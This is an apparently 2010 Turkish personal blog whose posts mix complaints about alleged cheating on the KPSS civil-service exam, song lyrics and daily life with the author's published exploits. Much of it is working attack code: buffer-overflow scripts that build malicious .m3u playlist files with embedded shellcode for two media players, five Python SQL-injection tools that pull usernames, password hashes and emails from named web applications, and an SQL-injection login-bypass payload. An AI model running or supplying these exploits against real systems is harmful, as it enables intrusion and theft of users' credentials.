neler neler olmusta haberimiz yok 2009 da eğitim sorusunu yanlış dahi olsa cevaplayamayan hatta sınava girmeye dahi gerek duymayan kişiler 2010 da eğitim fullemiş :S haberi olduğu gibi veriyorum buyrun sizde gözlerinizle sonucları görün (TC numaraları haric)
800 bin adayın katıldığı KPSSnin sonuçlarına göre 500’ün üzerinde katılımcının eğitim bilimleri sınavında 120de 120 net çıkarması da tartışma konusu oldu.
Bazı adaylar, 2009da yapılan KPSS’deki sınav birincisinin bile tüm soruları doğru yanıtlayamadığını anımsatarak, ‘Acaba polislik sınavında olduğu gibi sorular bazı kesimlerce ele mi geçirildi?’ kuşkusunu taşıdıklarını dile getirdi.
Netlerinin yanlış hesaplandığını ve puanlarının beklediklerinden daha düşük geldiğini öne süren adaylar, ÖSYMye dilekçeyle göndermeye başladı. ÖSYM Başkanı Prof. Dr. Ünal Yarımağan, KPSSye ilişkin yapacağım bir açıklama yok, bu yüzden bu konuda görüş belirtmek istemiyorum” diyerek soruları yanıtsız bıraktı.
Yetkililer, eğitim bilimleri sınavında çok sayıda adayın tüm soruları doğru yanıtlamasını da yine soruların kolay olmasına bağlayarak, “Sonucuyla ilgili kuşkuları olanlar bize başvurabilirler” mesajı verdiler.
Eğitim-Sen Genel Başkanı Zübeyde Kılıç da KPSS’ye yönelik güvensizliği artıracak bir dizi sorun yaşandığını vurgulayarak, şöyle konuştu;
Bu sorunlardan dolayı bazı kesimler, sonuçlara kuşkuyla yaklaşıyor. ÖSYMye ve yaptığı sınavlara ilişkin her sonuç açıklanması sırasında, ‘Acaba şimdi ne sorun çıkacak? sorusu akıllara geliyor. Çok sayıda aday bize de gelip kuşkularını dile getirdi. Ancak biz soruların çalındığına ilişkin net bir veriye sahip değiliz.
Bu bir olasılık dahilinde, polis koleji sınavında da bir şaibe olmuştu, sonra sınav iptal edilmişti. Şimdi de bazı şaibeler ortaya atılıyor ama elimizde bunu kanıtlayan herhangi bir şey yok. Elimizde kanıt olmadığı için bir şey söyleyemiyoruz.
Soy isimlerinde de benzerlik olan bazı kişilerin sonuçlarını gözledik. Bir Kaç Tc kimlik numarasından baktığımız sonuçlar şöyle:
http://sesiniduyur.org/kpss/vedat2009.htm
http://sesiniduyur.org/kpss/vedat2010.htm
http://sesiniduyur.org/kpss/filiz2009.htm
http://sesiniduyur.org/kpss/filiz2010.htm
http://sesiniduyur.org/kpss/levent2009.htm
http://sesiniduyur.org/kpss/levent2010.htm
http://sesiniduyur.org/kpss/seher2009.htm
http://sesiniduyur.org/kpss/seher2010.htm
kaynak:
http://sesiniduyur.org/detay-44-kpss_2010_sorulari_birilerine_verildi.html
20 Ağustos 2010 Cuma
19 Ağustos 2010 Perşembe
koyma açık, açık olmaz ;)
şimdi birazcık inj3ct0r.com da geziniyim dedim oda nesi biri acık yayınlamıs acığın sonuna da bypassı eklemiş ;) author vermiyorum darılmaca olmasın diye ;)
Vulnerable File in admin/giris.php
###################################################
################### Error Line'z ####################
$sorgu=mysql_query("select * from yonetim where isim='$isim' and sifre='$sifre'");
###################################################
Inject to giris.php
Exploitiez
id : ' or 1=1/*
pw : ' or 1=1/*
oldumu babacan demedin mi biri indirir scripti :S a.q adam engellemiş scripte bypassı boş bug göndermeyin inceleyin iyice :S sadece sorguya bakarak acık mevcut diyemezsin ki :S bak bakalım line 61 den aşağısına
//line 61
$isim=$_POST['isim'];
$sifre=$_POST['sifre'];
$isim=htmlspecialchars(mysql_real_escape_string($isim));
$sifre=htmlspecialchars(mysql_real_escape_string($sifre));
adam paşalar gibi önlemini almıs :S
sırf asağıda ki sorgudan yola cıkamazsın
//line 73
$sorgu=mysql_query("select * from yonetim where isim='$isim' and sifre='$sifre'");
$sayi=mysql_num_rows($sorgu);
ne biliyim a.q nerdesin str0ke :S
Vulnerable File in admin/giris.php
###################################################
################### Error Line'z ####################
$sorgu=mysql_query("select * from yonetim where isim='$isim' and sifre='$sifre'");
###################################################
Inject to giris.php
Exploitiez
id : ' or 1=1/*
pw : ' or 1=1/*
oldumu babacan demedin mi biri indirir scripti :S a.q adam engellemiş scripte bypassı boş bug göndermeyin inceleyin iyice :S sadece sorguya bakarak acık mevcut diyemezsin ki :S bak bakalım line 61 den aşağısına
//line 61
$isim=$_POST['isim'];
$sifre=$_POST['sifre'];
$isim=htmlspecialchars(mysql_real_escape_string($isim));
$sifre=htmlspecialchars(mysql_real_escape_string($sifre));
adam paşalar gibi önlemini almıs :S
sırf asağıda ki sorgudan yola cıkamazsın
//line 73
$sorgu=mysql_query("select * from yonetim where isim='$isim' and sifre='$sifre'");
$sayi=mysql_num_rows($sorgu);
ne biliyim a.q nerdesin str0ke :S
Etiketler:
Auth Bypass,
bug bulma,
inj3ct0r.com,
login bypass,
milw0rm.com
hobaaa eğitim full

işte gelde sorular çalındı amuğa koyum deme. benim girmediğim deneme kalmadı fullenecek sınavı da biliyoruz zor sınavıda bu seneki eğitime basit diyen adamın amına koyarım la hiç mi basit sınav görmedik sabahki basitti itiraz eden? efenim ? ses yok. ama eğitim zordu sabahkini fulleyemeyen adam eğitimi hiç fulleyemez rahat 10 tane kaynaklarda dahi olmayan bilgileri bilmeyi gerektiren soru vardı hem nerde görülmüş 300 üstü kişinin şimdiye kadar eğitim fullediği :S tabi bu ne kadar doğru bilemiyorum işte yazıya denk geldiğim site işte resim ;) benim devletimize ve hükümetimize güvenim sonsuz eminim ki gereken yapılacaktır sadece su fulleyenler ve fulle yakın yapanlar devre dısı bırakılsa dahi yeter sınavın iptaline gerek bile kalmaz
kaynak:
http://www.sesiniduyur.org/detay-41-_kpss_2010__da_kopya_olayi:_iste_kanit.html
kaynak 2:
http://www.memurlar.net/haber/174657/
18 Ağustos 2010 Çarşamba
kpss:2 - ZoRLu:2

meb kendi kalesine bir gol attı ama var bunda da bir bit yeniği de bakalım fen ve teknoloji taban puanı 80 :D görürsünüz bizlere 3. golü atmak için bi hamle bu bekleyelim görelim ;)
Ramazan da herhangi bir günüm
bu ay biliyorsunuz rut(in.) şimdi ramazanda herhangi bir günümden bahsedeyim. gece 4 ten sonra yat a.q ertesi gün 2-3 gibi uyan iftara kadar net iftar sonrası net yada tühkan :S yine sahuru yap 4 ten sonra yat ertesi güne bugünü kopyala yapıstır :S ramazanın kaçıncı gününü tutuyoruz ondan bile bi haber :S ramazan başlamış başlayalı hiç şaşmadı. hee bide mide ağrıları basladı bakalım hayırlısı.
//Not: Hayırlı Ramazanlar
//Not: Hayırlı Ramazanlar
Etiketler:
meb hep senin yüzünden,
mide yanması,
midede kramp,
rut(in)
14 Ağustos 2010 Cumartesi
sevemem senden baska gozum arar gozlerini
off ulan offf
sevemem senden baska gozum arar gozlerini
Yükleyen shursuz. - Öne çıkan müzik videolarını izleyin.
Sevemem senden başka
Gözüm arar gözlerini
Dil söyler kalbim ağlar
Yürek çeker özlemini
Kulağımdan sesini
Gözlerimden hayalini
Atamam ah atamam
Sen olmayınca yapamam
sevemem senden baska gozum arar gozlerini
Yükleyen shursuz. - Öne çıkan müzik videolarını izleyin.
Sevemem senden başka
Gözüm arar gözlerini
Dil söyler kalbim ağlar
Yürek çeker özlemini
Kulağımdan sesini
Gözlerimden hayalini
Atamam ah atamam
Sen olmayınca yapamam
12 Ağustos 2010 Perşembe
kpss:2 - ZoRLu:1
ben böyle gol görmedim aga insan doksana takar mı? :S sonucu görünce sok oldum suan ağzım gözüm yara bere içinde dudağum uçukladı yav 82 küsür bişey almışım yav bi 3 puan ile insan acıkta kalırmı :S gecen sene 6 puan sapmayla 57 alacakken puanım 63 oldu bu sene 1 puan ya sapmıştır yada o kadar bile sapmamıştır böyle işin içine sıçayım :S napsınn bu kardeşiniz küçük bi tavsiye verin yön belirlememde etkili olur çok kararsızım :((((
11 Ağustos 2010 Çarşamba
sorgulama sayfası
14 te acıklayan ibnedir demiştim :D
hay sizin sisteminize :D lan saat 15:30 oldu halen daha server too busy :S la bi gidin yav :S
10 Ağustos 2010 Salı
KPSS 2010-Lisans sınavı sonuçları yarın açıklanacak
açıklamayın artık a.q 4 gündür bekliyoruz pazartesiden çarşambaya ne değişecekki illa bekleteceksiniz bu milleti :S ulan beklediğimiz birsey de bir gün zamanında gercekleşsin :/
haberin detayları:
Açıklamaya göre 10-11 Temmuz 2010 tarihlerinde yapılan Kamu Personel Seçme Sınavı (KPSS-Lisans) değerlendirilmesi çalışmaları tamamlandı.
Sonuçlar 11 Ağustos 2010 Çarşamba günü saat 14:00'da açıklanacak.
Adaylar sonuçları 11 Ağustos 2010 Çarşamba günü saat 14:00'dan itibaren http://www.osym.gov.tr internet adreslerinden öğrenebilecek.
kaynak:
http://www.cnnturk.com/2010/turkiye/08/10/kpss.2010.lisans.sinavi.sonuclari.yarin.aciklanacak/586244.0/index.html
haberin detayları:
Açıklamaya göre 10-11 Temmuz 2010 tarihlerinde yapılan Kamu Personel Seçme Sınavı (KPSS-Lisans) değerlendirilmesi çalışmaları tamamlandı.
Sonuçlar 11 Ağustos 2010 Çarşamba günü saat 14:00'da açıklanacak.
Adaylar sonuçları 11 Ağustos 2010 Çarşamba günü saat 14:00'dan itibaren http://www.osym.gov.tr internet adreslerinden öğrenebilecek.
kaynak:
http://www.cnnturk.com/2010/turkiye/08/10/kpss.2010.lisans.sinavi.sonuclari.yarin.aciklanacak/586244.0/index.html
8 Ağustos 2010 Pazar
CoolPlayer219_Bin (.m3u) (buf+eip+nop / 253 byt) Buffer Overflow Exploit (.py)
http://inj3ct0r.com/exploits/13618
#!/usr/bin/env python
#-*- coding:cp1254 -*-
print "**************************************************************************"
print " CoolPlayer219_Bin (.m3u) (buf+eip+nop / 253 byt) Buffer Overflow Exploit (.py)\n "
print " Exploited: ZoRLu / admin@yildirimordulari.com "
print " Thanks for first exploit : hadji samir (buf+eip+nop / 310 byt)"
print " Date: 08/08/2010 / Saat Gecenin 4 u "
print " Tested on: Windows Vista \n"
print " Home: z0rlu.blogspot.com "
print " Home: imhatimi.org "
print " Thanks: inj3ct0r.com, r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N\n"
print "**************************************************************************"
karala = "\x41" * 237
eyip = "\x3D\x94\x0F\x77" #0x770F943D jmp esp / kernel32.dll
fiytiripat = "\x90" * 12
shell = (
"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x38"
"\x78\x73\x8a\x83\xeb\xfc\xe2\xf4\xc4\x90\x37\x8a\x38\x78\xf8\xcf"
"\x04\xf3\x0f\x8f\x40\x79\x9c\x01\x77\x60\xf8\xd5\x18\x79\x98\xc3"
"\xb3\x4c\xf8\x8b\xd6\x49\xb3\x13\x94\xfc\xb3\xfe\x3f\xb9\xb9\x87"
"\x39\xba\x98\x7e\x03\x2c\x57\x8e\x4d\x9d\xf8\xd5\x1c\x79\x98\xec"
"\xb3\x74\x38\x01\x67\x64\x72\x61\xb3\x64\xf8\x8b\xd3\xf1\x2f\xae"
"\x3c\xbb\x42\x4a\x5c\xf3\x33\xba\xbd\xb8\x0b\x86\xb3\x38\x7f\x01"
"\x48\x64\xde\x01\x50\x70\x98\x83\xb3\xf8\xc3\x8a\x38\x78\xf8\xe2"
"\x04\x27\x42\x7c\x58\x2e\xfa\x72\xbb\xb8\x08\xda\x50\x88\xf9\x8e"
"\x67\x10\xeb\x74\xb2\x76\x24\x75\xdf\x1b\x12\xe6\x5b\x78\x73\x8a"
)
yazciz = karala + eyip + fiytiripat + shell
try:
olustur = open("zrl.m3u","w")
olustur.write(yazciz)
olustur.close()
print "Tamadir Exploit Hazir\n"
except:
print "Dosya Olusturulamadi\n"
# Inj3ct0r.com [2010-08-08]
Destiny Media Player 1.61 (.m3u/.lst) Buffer Overflow Exploit
http://inj3ct0r.com/exploits/13613
#!/usr/bin/perl
# Destiny Media Player 1.61 (.m3u/.lst) Buffer Overflow Exploit(.pl)
# Exploit Coded By ZoRLu / admin@yildirimordulari.com
# Date: 07/08/2010
# Tested on my XP pc: http://img530.imageshack.us/img530/336/dest.jpg
# Home: z0rlu.blogspot.com
# Home: imhatimi.org
# Thanks: inj3ct0r.com, r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N
my $karala = "\x90" x 2052;
#C:\Documents and Settings\Administrator\Desktop\find>Findjmp.exe kernel32.dll esp
#0x7C86467B jmp esp
my $blah = "\x7B\x46\x86\x7C";
my $fiytiripat = "\x90" x 12;
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
my $shellcode =
"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x38".
"\x78\x73\x8a\x83\xeb\xfc\xe2\xf4\xc4\x90\x37\x8a\x38\x78\xf8\xcf".
"\x04\xf3\x0f\x8f\x40\x79\x9c\x01\x77\x60\xf8\xd5\x18\x79\x98\xc3".
"\xb3\x4c\xf8\x8b\xd6\x49\xb3\x13\x94\xfc\xb3\xfe\x3f\xb9\xb9\x87".
"\x39\xba\x98\x7e\x03\x2c\x57\x8e\x4d\x9d\xf8\xd5\x1c\x79\x98\xec".
"\xb3\x74\x38\x01\x67\x64\x72\x61\xb3\x64\xf8\x8b\xd3\xf1\x2f\xae".
"\x3c\xbb\x42\x4a\x5c\xf3\x33\xba\xbd\xb8\x0b\x86\xb3\x38\x7f\x01".
"\x48\x64\xde\x01\x50\x70\x98\x83\xb3\xf8\xc3\x8a\x38\x78\xf8\xe2".
"\x04\x27\x42\x7c\x58\x2e\xfa\x72\xbb\xb8\x08\xda\x50\x88\xf9\x8e".
"\x67\x10\xeb\x74\xb2\x76\x24\x75\xdf\x1b\x12\xe6\x5b\x78\x73\x8a";
open(myfile,'>>zrl.m3u');
print myfile $karala.$blah.$fiytiripat.$shellcode;
close(myfile)
# Inj3ct0r.com [2010-08-07]
7 Ağustos 2010 Cumartesi
findjmp
buffer overflow ile ilgilenenlerin işine yarar aradım zor buldum a.q :S sizlerlede paylaşayım kullanırsınız
Not:
içiniz rahat olsun dosyayı gönül rahatlığıyla indirip kullanabilirsiniz bende yamuk olmaz ;)
download:
http://hotfile.com/dl/60589778/0841783/findjmp.zip.html
Not:
içiniz rahat olsun dosyayı gönül rahatlığıyla indirip kullanabilirsiniz bende yamuk olmaz ;)
download:
http://hotfile.com/dl/60589778/0841783/findjmp.zip.html
Etiketler:
buffer overflow,
buffer overflow exploit yazma,
findjmp,
findjmp.exe
5 Ağustos 2010 Perşembe
16 yaşındayım hacker olmak istiyorum :S

nette boş boş gezerken bir blogda gözüme şöyle bir yazı çarptı gözüm morardı :D 16 yaşındayım bilgisayardan iyi anlıyorum hacker olmak istiyorum hacker olma yoluna koyuldum. eğer resimdeki yazıyı okursanız sanki bir iş ilanı :S millete hack hacker bu gibi kelimeler nasıl lanse ediliyorsa artık biraz bilgisayara ilgi duyan direk hacker olcam diyor. hacker oldun nolcak a.q :S güzel ülkemin güzel insanları hack mack boş gibi laflarla nasihat çekmeyecem ama bu işe başlamadan önce iyice düşünün napıyorum ben demeyi ihmal etmeyin eğer amacınız voov x neymiş be dedirtmekse baştan hiçç girmeyin bu tarz işlere bana sorsanız amacınız nolursa olsun uzak durun ama illada yapacam diyorsanız amacınız boş hevesleri gerçekleştirmek olmasın.
Kendime Not:
//SonKr(o)liçe bile hacker olursa (!) bu veledim neden hacker olmasın be zorlu :D
2 Ağustos 2010 Pazartesi
exploitler ile ilgili
şimdi bu blogspot kafasına göre güvenlik uygulaması yapıyor ya :D dolayısıyla exploitleri tam yayınlayamıyorum yani kodlar eksik olabilir benim blogda. dolayısıyla verdiğim orjinal linklerden kullanın ;) blogspottan sıkılmaya başladım bakalım çözüm nolcak :S
WordPress Plugin myLDlinker (myLDlinker.php) SQL Injection Exploit (.py)
http://inj3ct0r.com/exploits/13553
========================================================================
WordPress Plugin myLDlinker (myLDlinker.php) SQL Injection Exploit (.py)
========================================================================
#!/usr/bin/env python
#-*- coding:utf-8 -*-
# WordPress Plugin myLDlinker (myLDlinker.php url) SQL Injection Exploit (.py)
# Author ZoRLu
# Exploit Coded By ZoRLu / Date: 02/08/2010
# Found H-SK33PY / Date: 22/07/2010
# Orijinal Link http://inj3ct0r.com/exploits/13438
# Tested on my vista proof: http://img196.imageshack.us/img196/5655/wordvm.jpg
# Home: z0rlu.blogspot.com
# Home: imhatimi.org
# Thanks: inj3ct0r.com, r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N and all Friends
import sys, urllib2, re, os, time
if len(sys.argv) < 2:
os.system('cls')
os.system('clear')
os.system('color 2')
print "_______________________________________________________________"
print " "
print " WordPress Plugin myLDlinker SQL Inj Exploit (.py) "
print " "
print " coded by ZoRLu "
print " "
print " Usage: "
print " "
print " python exploit.py http://site.com/path/ "
print " "
print "_______________________________________________________________"
sys.exit(1)
add = "http://"
add2 = "/"
sitemiz = sys.argv[1]
if sitemiz[-1:] != add2:
print "\nwhere is it: " + add2
print "okk I will add"
time.sleep(2)
sitemiz += add2
print "its ok" + " " + sitemiz
if sitemiz[:7] != add:
print "\nwhere is it: " + add
print "okk I will add"
time.sleep(2)
sitemiz = add + sitemiz
print "its ok" + " " + sitemiz
vulnfile = "myLDlinker.php"
sql = "?url=00000000+union+select+1,concat(0x3e3e3e,user_login,0x3a3a,user_pass,0x3a3a),3,4,5,6,7,8+from+wp_users--"
url = sitemiz + vulnfile + sql
print "\nExploiting...\n"
print "wait three sec.!\n"
time.sleep(3)
try:
veri = urllib2.urlopen(url).read()
aliver = re.findall(r">>>(.*)([0-9a-fA-F])(.*)", veri)
if len(aliver) > 0:
print "user::hash:: " + aliver[0][0]
print "\nGood Job Bro!"
else:
print "Exploit failed..."
except urllib2.HTTPError:
print "Forbidden Sorry! Server has a Security!"
# Inj3ct0r.com [2010-08-02]
Eremetia (news.php & faq2.php id) SQL Injection Exploit (.py)
http://inj3ct0r.com/exploits/13552
=============================================================
Eremetia (news.php & faq2.php id) SQL Injection Exploit (.py)
=============================================================
#!/usr/bin/env python
#-*- coding:cp1254 -*-
# Eremetia (news.php & faq2.php id) SQL Injection Exploit (.py)
# Author ZoRLu
# Exploit Coded By ZoRLu / Date: 02/08/2010
# Found The_Exploited / Date: 29/04/2010
# Orijinal Link http://inj3ct0r.com/exploits/12059
# Tested on my vista proof: http://img251.imageshack.us/img251/4673/eremetia.jpg
# Home: z0rlu.blogspot.com
# Home: imhatimi.org
# Thanks: inj3ct0r.com, r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N and all Friends
import sys, urllib2, re, os, time
if len(sys.argv) < 2:
os.system('cls')
os.system('clear')
os.system('color 2')
print "_______________________________________________________________"
print " "
print " Eremetia (id) SQL Inj Exploit (.py) "
print " "
print " coded by ZoRLu "
print " "
print " Usage: "
print " "
print " python exploit.py http://site.com/path/ "
print " "
print "_______________________________________________________________"
sys.exit(1)
add = "http://"
add2 = "/"
sitemiz = sys.argv[1]
if sitemiz[-1:] != add2:
print "\nwhere is it: " + add2
print "okk I will add"
time.sleep(2)
sitemiz += add2
print "its ok" + " " + sitemiz
if sitemiz[:7] != add:
print "\nwhere is it: " + add
print "okk I will add"
time.sleep(2)
sitemiz = add + sitemiz
print "its ok" + " " + sitemiz
vulnfile = "news.php"
sql = "?id=000000000+union+select+1,2,concat(0x3a3a3a,login,0x3a3a,senha,0x3a3a3a),4,5+from+admin"
url = sitemiz + vulnfile + sql
vulnfile2 = "faq2.php"
sql2 = "?id=000000000+union+select+1,2,concat(0x3a3a3a,login,0x3a3a,senha,0x3a3a3a),4+from+admin"
url2 = sitemiz + vulnfile2 + sql2
print "\nvulnfile:"+vulnfile
print "column_number: 5"
print "sql: "+sql
print "\nExploiting...\n"
print "wait three sec.!\n"
time.sleep(3)
try:
veri = urllib2.urlopen(url).read()
aliver = re.findall(r":::(.*)([0-9a-fA-F])(.*):::", veri)
if len(aliver) > 0:
print "login::password: " + aliver[0][0]+ aliver[0][1]
print "\n" + vulnfile + " ok!"
print "wait for other file"
time.sleep(2)
else:
print "Exploit failed..."
except urllib2.HTTPError:
print "Forbidden Sorry! Server has a Security!"
print "\nvulnfile:"+vulnfile2
print "column_number: 4"
print "sql: "+sql2
print "\nExploiting...\n"
print "wait three sec.!\n"
time.sleep(3)
try:
veri = urllib2.urlopen(url2).read()
aliver = re.findall(r":::(.*)([0-9a-fA-F])(.*):::", veri)
if len(aliver) > 0:
print "login::password: " + aliver[0][0]+ aliver[0][1]
print "\nGood Job Bro!"
print "we searched for " + vulnfile + " and " + vulnfile2
else:
print "Exploit failed..."
except urllib2.HTTPError:
print "Forbidden Sorry! Server has a Security!"
# Inj3ct0r.com [2010-08-02]
eSmart-Vision Trading (g_details.php id) SQL Injection Exploit (.py)
http://inj3ct0r.com/exploits/13549
====================================================================
eSmart-Vision Trading (g_details.php id) SQL Injection Exploit (.py)
====================================================================
#!/usr/bin/env python
#-*- coding:utf-8 -*-
# eSmart-Vision Trading (g_details.php id) SQL Injection Exploit (.py)
# Found & Coded By ZoRLu
# Tested on my vista proof: http://img251.imageshack.us/img251/7747/esmart.jpg
# Date: 01/08/2010
# Home: z0rlu.blogspot.com
# Home: imhatimi.org
# Thanks: inj3ct0r.com, r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N and all Friends
import sys, urllib2, re, os, time
if len(sys.argv) < 2:
os.system('cls')
os.system('clear')
os.system('color 2')
print "_______________________________________________________________"
print " "
print " eSmart-Vision Trading SQL Inj Exploit (.py) "
print " "
print " coded by ZoRLu "
print " "
print " Usage: "
print " "
print " python exploit.py http://site.com/path/ "
print " "
print "_______________________________________________________________"
sys.exit(1)
add = "http://"
add2 = "/"
sitemiz = sys.argv[1]
if sitemiz[-1:] != add2:
print "\nwhere is it: " + add2
print "okk I will add"
time.sleep(2)
sitemiz += add2
print "its ok" + " " + sitemiz
if sitemiz[:7] != add:
print "\nwhere is it: " + add
print "okk I will add"
time.sleep(2)
sitemiz = add + sitemiz
print "its ok" + " " + sitemiz
vulnfile = "g_details.php"
sql = "?id=0000000+union+select+1,2,3,4,concat(0x3e3e3e,email,0x3a3a,password,0x3e3e3e),6,7+from+userinfo--"
url = sitemiz + vulnfile + sql
print "\nExploiting...\n"
print "wait three sec.!\n"
time.sleep(3)
try:
veri = urllib2.urlopen(url).read()
aliver = re.findall(r">>>(.*)([0-9a-fA-F])(.*)>>>", veri)
if len(aliver) > 0:
print "email::password: " + aliver[0][0]
print "\nGood Job Bro!"
else:
print "Exploit failed..."
except urllib2.HTTPError:
print "Forbidden Sorry! Server has a Security!"
# Inj3ct0r.com [2010-08-02]
Payment Processor Script (faq.htm farea) SQL Injection Exploit (.py)
http://inj3ct0r.com/exploits/13546
====================================================================
Payment Processor Script (faq.htm farea) SQL Injection Exploit (.py)
====================================================================
#!/usr/bin/env python
#-*- coding:utf-8 -*-
# Payment Processor Script (faq.htm farea) SQL Injection Exploit (.py)
# Found & Coded By ZoRLu
# Tested on my vista proof: http://img838.imageshack.us/img838/4229/proces.jpg
# Date: 01/08/2010
# Home: z0rlu.blogspot.com
# Home: imhatimi.org
# Thanks: inj3ct0r.com, r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N and all Friends
import sys, urllib2, re, os, time
if len(sys.argv) < 2:
os.system('cls')
os.system('clear')
os.system('color 2')
print "_______________________________________________________________"
print " "
print " Payment Processor Script SQL Inj Exploit (.py) "
print " "
print " coded by ZoRLu "
print " "
print " Usage: "
print " "
print " python exploit.py http://site.com/path/ "
print " "
print "_______________________________________________________________"
sys.exit(1)
sitemiz = sys.argv[1]
if sitemiz[-1:] != "/":
sitemiz += "/"
vulnfile = "faq.htm"
sql = "?farea=4+union+select+1,concat(0x3a3a3a,username,0x3a3a3a,password,0x3a3a3a),3+from+dp_members"
login = "members/login.htm"
url = sitemiz + vulnfile + sql
url2 = sitemiz + login
print "\nExploiting...\n"
print "wait three sec.!\n"
time.sleep(3)
try:
veri = urllib2.urlopen(url).read()
aliver = re.findall(r":::(.*)([0-9a-fA-F])(.*):::", veri)
if len(aliver) > 0:
print "username:::password: " + aliver[0][0]
print "\nGood Job Bro!"
print "you will be login"
print "Login: " + url2
else:
print "Exploit failed..."
except urllib2.HTTPError:
print "Forbidden Sorry! Server has a Security!"
# Inj3ct0r.com [2010-08-01]
BosDev BosClassifieds (cat_id) SQL Injection Exploit (.py)
http://inj3ct0r.com/exploits/13531
==========================================================
BosDev BosClassifieds (cat_id) SQL Injection Exploit (.py)
==========================================================
#!/usr/bin/env python
#-*- coding:utf-8 -*-
# BosDev BosClassifieds (cat_id) SQL Injection Exploit (.py)
# Found & Coded By ZoRLu
# Tested on my vista proof: http://img24.imageshack.us/img24/2729/bosdev.jpg
# Date: 31/07/2010
# Home: z0rlu.blogspot.com
# Home: imhatimi.org
# Thanks: Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N and all Friends
import sys, urllib2, re, os, time
if len(sys.argv) < 2:
os.system('cls')
os.system('clear')
os.system('color 2')
print "_______________________________________________________________"
print " "
print " BosDev BosClassifieds SQL Inj Exploit (.py) "
print " "
print " coded by ZoRLu "
print " "
print " Usage: "
print " "
print " python exploit.py http://site.com/path/ "
print " "
print "_______________________________________________________________"
sys.exit(1)
sitemiz = sys.argv[1]
if sitemiz[-1:] != "/":
sitemiz += "/"
url = sitemiz + "index.php?cat_id=-9999+union+select+concat(0x3a3a3a,username,password,0x3a3a3a)+from+bosdevUUS--"
print "\nExploiting...\n"
print "wait three sec.!\n"
time.sleep(3)
try:
veri = urllib2.urlopen(url).read()
aliver = re.findall(r":::(.*)([0-9a-fA-F]{32})(.*)", veri)
if len(aliver) > 0:
print "Username: " + aliver[0][0]
print "Password: " + aliver[0][1]
print "\nGood Job Bro!"
else:
print "Exploit failed..."
except urllib2.HTTPError:
print "Forbidden Sorry! Server has a Security!"
# Inj3ct0r.com [2010-08-01]
Kaydol:
Kayıtlar (Atom)